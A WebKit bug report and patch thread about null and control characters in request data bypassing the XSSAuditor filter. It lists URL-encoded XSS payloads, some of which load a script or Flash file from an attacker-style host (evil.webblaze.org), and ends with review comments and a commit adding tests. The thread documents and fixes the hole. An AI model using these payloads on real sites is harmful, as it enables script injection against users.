Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to JavaScript URLs. Examples: JavaScript URL with Null Character: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E JavaScript URL with Control Character: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E +++ This bug was initially created as a clone of Bug #27071 +++ Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to injected plugin-based objects, inline event handlers, and external scripts. Examples: Plugin-Injection: http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E Inline Event Handler: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E External Scripts: http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>
Created attachment 32565 [details] Patch with tests
Comment on attachment 32565 [details] Patch with tests This looks good, but can you make the same change to the V8 bindings in WebCore/bindings/v8?
Created attachment 32573 [details] Updated patch with tests. I made the changes in the V8 bindings, but how do I test it? Also, moved line "const String* savedSourceURL = m_sourceURL;" to its original place in file WebCore/bindings/js/ScriptController.cpp.
Comment on attachment 32573 [details] Updated patch with tests. This looks good. To test the V8 bindings, you need a Chromium build. I'll watch the chromium build bot to make sure it works fine.
Thanks. (In reply to comment #4) > (From update of attachment 32573 [details]) > This looks good. To test the V8 bindings, you need a Chromium build. I'll > watch the chromium build bot to make sure it works fine.
Sending LayoutTests/ChangeLog Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/javascript-link.html Adding LayoutTests/http/tests/security/xssAuditor/resources/echo-intertag-click-and-notify.pl Sending WebCore/ChangeLog Sending WebCore/bindings/js/ScriptController.cpp Sending WebCore/bindings/v8/ScriptController.cpp Sending WebCore/page/XSSAuditor.cpp Sending WebCore/page/XSSAuditor.h Transmitting file data ............. Committed revision 45741. http://trac.webkit.org/changeset/45741